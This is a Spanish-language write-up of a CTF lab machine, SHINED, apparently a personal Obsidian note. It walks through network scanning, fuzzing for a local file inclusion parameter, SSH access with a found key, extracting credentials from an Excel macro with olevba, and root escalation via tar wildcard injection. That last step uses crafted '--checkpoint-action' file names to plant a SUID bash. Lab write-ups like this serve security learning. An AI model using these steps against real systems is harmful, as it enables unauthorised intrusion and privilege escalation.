MAQUINA SHINED (WFuzz search parametros + ruta - Olevba xmls - Mov Lateral - PrivEsc backup.tar.gz)
📝 Reporte CTF – Template (para Obsidian)
📌 Información General
Nombre del CTF / Lab: SHINED
Fecha: 20/09/2025
Participante: 1gnotus
🎯 Objetivos
Acceso inicial
Escalada de privilegios
Captura de flags
🔍 Reconocimiento
Escaneo de Red
arp-scan --interface=eth0 --localnet
IP: 192.168.0.205Enumeración de Servicios
nmap -p- --open -sSCV --min-rate 3000 -n -Pn 192.168.0.205
Waappalyzer
Fuzzing de directoriosnmap -p80 --script=http-enum.nse 192.168.0.205
feroxbuster -u URL -w WORDLISTS -x php,html,txt
🚪 Explotación
Ruta /access.php vulnerable a LFI (Se busco el parametro de la url y a la vez la ruta del /etc/passwd)wfuzz -c \
-z file,/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-1.0.txt \
-z file,/usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
-u "http://192.168.0.205/access.php?FUZZ=FUZ2Z"
📈 Escalada de Privilegios
Se accede a la maquina a través de la id_rsa.
chmod 600 id_rsa
ssh -i id_rsa cifra@192.168.0.205 -p2222Dentro hay un archivo interesante.
Para verificar el contenido utilice olevba, se puede hacer con libreoffice pero da un error en la macro.
`olevba` te permite auditar y analizar macros de Excel desde Linux sin abrir Excel, ideal para pentesting o análisis de archivos sospechosos.olevba contabilidad.xlsm
Con estas credenciales obtuve acceso mediante el puerto 22 SSH (Nos movemos del contenedor a la maquina local)
ssh leopoldo@192.168.0.205
En la carpeta /Desktop/scripts hay un archivo backup.tar.gz, con pspy64 encontré una tarea interesante que el propietario es root, para aprovechar esa tarea y obtener acceso como root hice lo siguiente.
echo "" > '--checkpoint=1'
echo "" > '--checkpoint-action=exec=sh privesc.sh'
nano priviesc.sh --> (copia y pega) --> chmod u+s /tmp/bash
Luego ve la carpeta /tmp y esperar que la bash este en rojo.
Last updated